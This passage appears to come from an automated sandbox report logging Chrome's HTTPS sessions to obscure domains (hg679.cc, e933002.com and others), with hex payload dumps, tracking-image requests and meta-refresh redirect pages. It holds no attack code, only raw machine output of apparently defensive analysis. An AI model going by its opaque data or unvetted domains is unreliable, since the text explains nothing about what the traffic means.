                                                                                                                                                          2024-06-09 22:40:46 UTC16384INData Raw: cb 44 17 e0 c0 87 8a 12 ae 0e 72 ab ff 2c 3a b1 9c 2d 3b 48 94 34 40 b0 1e 9f b0 a1 46 70 98 43 26 2a 46 17 af 63 1d 5b 0a 28 94 28 36 b1 99 5d aa d2 12 9b 39 02 77 41 90 99 6a 79 62 be 50 f7 83 46 79 47 79 a0 9c 01 f4 06 85 82 72 84 91 21 11 38 23 68 24 70 3d ed 51 0f 34 89 e2 c1 3b 7b c3 03 19 78 a1 7e f4 1b 9f f8 e6 a8 34 a7 6d 4a 6a 54 db 14 40 39 c5 29 1a c4 03 54 4a 10 82 12 04 69 07 6f 20 12 0b 58 58 00 03 24 11 2b 64 50 b4 a2 b3 40 46 04 2c f4 82 8d 72 b4 a3 9a 24 51 47 43 fa 02 27 c4 4d 22 98 1c c8 47 ef 76 90 05 b1 54 02 06 12 4a 82 5a 3a 20 50 ae c7 94 36 bd 29 4e 73 ea 11 07 e8 72 5b ac bc 17 87 70 82 39 99 d8 4b 26 29 3c aa 0a 25 b2 0d a4 a6 d0 5c b8 04 0b 8e 0c 17 13 07 a8 4e 02 bf 04 e6 56 5e 20 81 19 e2 4e 31 29 f3 9d c5 c2 2a 56 b1 76 55
                                                                                                                                                          Data Ascii: Dr,:-;H4@FpC&*Fc[((6]9wAjybPFyGyr!8#h$p=Q4;{x~4mJjT@9)TJio XX$+dP@F,r$QGC'M"GvTJZ: P6)Nsr[p9K&)<%\NV^ N1)*VvU
                                                                                                                                                          2024-06-09 22:40:46 UTC16384INData Raw: 03 b2 b5 a5 fb b5 df 02 cc 92 3b 88 41 7c ce e7 5d 56 99 1d 6c 55 25 a5 59 49 14 e4 b6 b9 5b 05 0c 26 25 b6 d7 7f 82 83 41 2e 17 17 a4 8a ac 58 84 44 f2 db e2 4d 44 08 65 97 03 c5 85 07 62 66 5d 5d a6 35 cd 22 59 0c c2 24 1c 9a 11 1c 0f 91 ac a6 6b 86 a8 88 2e 09 0e 5a 11 6e 42 0c ca a5 a8 8a e2 c5 6f 5e c6 37 dc 03 11 10 4c 6d ca 5c 66 0d 00 ed 68 5a 38 40 e5 49 38 27 8f 36 21 59 50 94 ce 0c 0a 18 26 1d 91 16 a9 91 2a 12 05 68 e7 91 ed ff c6 cb 44 e7 39 96 21 bc e4 9c 49 8c e5 41 94 67 1a 1e db 79 ba 23 d6 65 c3 02 c0 12 2c cd 92 7c da 65 98 d6 e7 56 25 97 5f 96 c4 73 b9 43 55 49 e2 42 26 c1 9c fd 03 bc 39 64 52 41 24 a7 b0 87 9f e5 d7 bf b5 4a 08 55 d7 a4 08 01 07 c2 c5 84 52 28 e4 fc 43 a0 c6 d5 2f d0 81 5a d0 41 48 1a d8 a1 2a 09 88 8e 28 a4 46 aa 5c
                                                                                                                                                          Data Ascii: ;A|]VlU%YI[&%A.XDMDebf]]5"Y$k.ZnBo^7Lm\fhZ8@I8'6!YP&*hD9!IAgy#e,|eV%_sCUIB&9dRA$JUR(C/ZAH*(F\
                                                                                                                                                          2024-06-09 22:40:46 UTC16384INData Raw: 2c 77 7b 76 17 4e 7a bc 26 7b a6 13 76 b4 58 a8 a1 3c 44 9b a8 7c 5a d9 61 8d 0b c6 a8 73 a3 a4 68 0d 93 64 80 e0 02 18 93 2e 9a c2 c4 e0 4b 0c 32 c8 64 a6 ae e0 55 0b 71 a4 04 17 c1 a8 a2 26 c5 42 1d 6f a4 aa 6f be fc ee eb 6f bf 6f d0 01 53 95 56 62 59 f0 97 06 7b 79 30 ac 3c c9 ca 0e 10 40 3c 0c 71 c4 bf 08 2c 54 00 6d 4c ac f1 25 75 e0 aa ec c7 20 ab f7 8e 77 6f 0e 6b f2 c9 e4 91 fc 4e c8 2c 67 d8 19 7c e3 18 8a 28 0f 33 47 1b 8c 8c f3 79 e0 28 a4 3e f6 3c 96 8e c3 8c db a9 4c 45 0a 68 6e a7 43 26 91 c4 4b 4c aa 43 17 5c 80 2d 42 69 05 8b e0 46 6f 84 49 d5 71 89 c6 5c 77 ed f5 c4 af fe c3 02 ad 64 97 6d 76 1b 16 ef 94 45 15 5f 03 61 c4 50 18 7b cd b1 c7 2d d7 6d b7 64 69 8e a8 a7 9d 7c e7 ff d9 f7 de 7e d3 89 e7 e0 da 15 ab 9d 89 77 27 ee 9c 24 83 7e
                                                                                                                                                          Data Ascii: ,w{vNz&{vX<D|Zashd.K2dUq&BooooSVbY{y0<@<q,TmL%u wokN,g|(3Gy(><LEhnC&KLC\-BiFoIq\wdmvE_aP{-mdi|~w'$~
                                                                                                                                                          2024-06-09 22:40:46 UTC16384INData Raw: 84 78 ac e1 71 46 74 6f 05 c4 20 06 6f 78 23 0e e7 58 40 bd 10 ba 5a af 76 75 a1 fb f3 d7 30 36 f5 29 2e cc 96 0b 5f 3c 6b 6f 51 30 83 0e 7b d8 c3 bd cd e8 c4 6c 07 dc ce 1c 04 05 56 c3 86 ee 1e 12 d2 e5 fa ae b9 e2 8d 31 99 b6 a1 21 ec 16 16 79 17 60 81 8e 77 cc e3 1e fb 78 c7 db a8 6e 4a a3 f3 9d a5 2c a1 85 1d 9e 60 45 26 29 e3 e3 58 24 02 4e 70 c2 2a 90 21 0d 14 ac b7 17 c3 c8 32 5a fe f1 9a 35 0c 55 5b e8 82 9c 52 3b ab b8 7d d2 40 0d fe ac 00 27 5f a2 86 fd 9a 6f ff 34 62 58 03 b8 30 2b 44 02 93 96 04 b4 0c 9d e8 aa b8 bf 7f 6c ca cf 54 da c6 3f 50 70 c5 6d a0 40 80 11 38 d0 16 77 d3 4b 2e 70 c2 20 99 e9 2d 30 45 4c 4c 99 e8 a3 c4 24 d5 2d c3 b0 31 ab f3 a0 a0 1e 33 a0 e0 4c ea da 30 17 67 10 c6 4d 4e 75 85 fc aa c7 e7 d8 b8 6a d1 6b d3 2e 58 10 e4
                                                                                                                                                          Data Ascii: xqFto ox#X@Zvu06)._<koQ0{lV1!y`wxnJ,`E&)X$Np*!2Z5U[R;}@'_o4bX0+DlT?Ppm@8wK.p -0ELL$-13L0gMNujk.X
                                                                                                                                                          2024-06-09 22:40:46 UTC16384INData Raw: 61 58 c1 8c ff 70 15 0f 4b 02 0b 80 05 1e b0 98 0f 6b 72 28 79 56 ff a1 80 f1 80 92 8c 02 99 a0 a6 0b c2 50 a5 fe b7 9f 5c f0 33 7b f8 23 6a c1 0c 3a 42 56 6a d1 23 b6 e6 1a 31 db 0b 34 2b 0c 34 ff 3b 0c 36 db 0b 36 6b 0d 34 6b 0d c3 47 a6 1f 08 48 c9 aa a6 8e 58 13 64 90 05 e6 10 a7 c6 47 07 d0 a6 b4 15 53 a1 b8 69 a1 dc 3a 13 19 5a af df 2a 1e c1 49 ae 3d 58 49 e8 5a 90 e6 0a 5a 5a 7b 43 6a 62 14 12 c9 9c cc d9 9c b9 93 1c 3c f1 09 8e 6a b5 38 31 18 d9 60 85 7c 67 28 69 6b 1c 4e 90 0d 33 80 0c 28 20 01 9e 9a 61 a0 ea b7 84 17 45 8b 66 15 5e f0 6a 56 61 69 58 81 05 13 3b a4 ee 80 05 90 79 98 28 69 80 4a b0 98 eb 99 b1 90 8b 98 76 c0 9e 71 70 0e 0f f0 08 ac f0 08 2e c0 45 bb e4 02 af a0 09 a1 4b ba a6 61 0c d8 e2 02 a1 cb 39 ac cb ba a6 ab ba a7 fb 01 a6
                                                                                                                                                          Data Ascii: aXpKkr(yVP\3{#j:BVj#14+4;66k4kGHXdGSi:Z*I=XIZZZ{Cjb<j81`|g(ikN3( aEf^jVaiX;y(iJvqp.EKa9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          83192.168.2.5498163.165.113.624434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:45 UTC566OUTGET /ocs/cc.png?1717972843131 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:45 UTC486INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:45 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 de90ec56435067f8d657c01248eb3328.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: CDG50-P3
                                                                                                                                                          X-Amz-Cf-Id: YiPaoU-e2S-bWeI7-bXTf07doguD9bpNYAqLjKQnYU71Er6_2ZoWOw==
                                                                                                                                                          2024-06-09 22:40:45 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          84192.168.2.54981718.66.147.554434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:45 UTC562OUTGET /ocs/cc.png?1717972843129 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aws.bakeddove.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:46 UTC486INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:46 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 a962efd99fafcdb81ca24e0e8140a67c.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                                          X-Amz-Cf-Id: -RrpvpbOw3oiMJBmQ0tZwthMSHLZIxpc6DiGPlCIZHNA6TFzq7hcZw==
                                                                                                                                                          2024-06-09 22:40:46 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          85192.168.2.549819163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:45 UTC369OUTGET /ocs/cc.png?1717972840810 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:46 UTC418INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:45 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache12.l2hk3[5,0], cache5.l2sg3[42,0], ens-cache6.de5[246,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55c9a17179728458076240e
                                                                                                                                                          2024-06-09 22:40:46 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          86192.168.2.54981238.174.148.2344434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:46 UTC634OUTGET / HTTP/1.1
                                                                                                                                                          Host: e933002.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:46 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:46 UTC34INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: no-cache,no-store
                                                                                                                                                          2024-06-09 22:40:46 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                                                                          2024-06-09 22:40:46 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:40:46 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                                                                          2024-06-09 22:40:46 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:40:46 UTC5INData Raw: 35 38 30 0d 0a
                                                                                                                                                          Data Ascii: 580
                                                                                                                                                          2024-06-09 22:40:46 UTC1415INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 32 3b 75 72 6c 3d 2f 3f 5f 5f 43 42 4b 3d 33 39 34 63 63 33 31 66 38 63 33 30 39 66 34 38 33 32 32 39 62 63 61 39 66 39 31 62 39 65 35 36 32 31 37 31 37 39 37 32 38 34 37 5f 31 32 31 33 37 32 39 37 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2e 73 6b 2d 74 68 72 65 65 2d 62 6f 75 6e 63 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f 3b 0a 09 77 69 64 74 68 3a 20 38
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="refresh" content="2;url=/?__CBK=394cc31f8c309f483229bca9f91b9e5621717972847_12137297" /><style type="text/css">.sk-three-bounce {position: absolute;top: 50%;left: 50%;margin: 40px auto;width: 8


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          87192.168.2.54981338.174.148.2344434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:46 UTC578OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: e933002.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:46 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:46 UTC34INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: no-cache,no-store
                                                                                                                                                          2024-06-09 22:40:46 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                                                                          2024-06-09 22:40:46 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:40:46 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                                                                          2024-06-09 22:40:46 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:40:46 UTC5INData Raw: 35 38 62 0d 0a
                                                                                                                                                          Data Ascii: 58b
                                                                                                                                                          2024-06-09 22:40:46 UTC1426INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 32 3b 75 72 6c 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 5f 5f 43 42 4b 3d 33 35 64 33 62 66 61 61 33 38 34 37 31 38 30 36 65 38 64 63 39 33 62 37 62 66 39 62 33 65 38 62 31 31 37 31 37 39 37 32 38 34 37 5f 31 32 31 33 37 32 39 39 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2e 73 6b 2d 74 68 72 65 65 2d 62 6f 75 6e 63 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="refresh" content="2;url=/favicon.ico?__CBK=35d3bfaa38471806e8dc93b7bf9b3e8b11717972847_12137299" /><style type="text/css">.sk-three-bounce {position: absolute;top: 50%;left: 50%;margin: 40px auto


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          88192.168.2.5498233.165.113.624434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:46 UTC655OUTGET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972844545290 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:47 UTC577INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:47 GMT
                                                                                                                                                          api-elapsed: 10
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Vary: Accept-Encoding,Accept-Encoding,Accept-Encoding
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 0a664d0529e2bd5dba55f6aeead607f2.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: CDG50-P3
                                                                                                                                                          X-Amz-Cf-Id: 83hKvj82QwT-1bwn5Zokj7Ohue3MeycsK0_Tl2w3ZxglwNk3A4K2dQ==
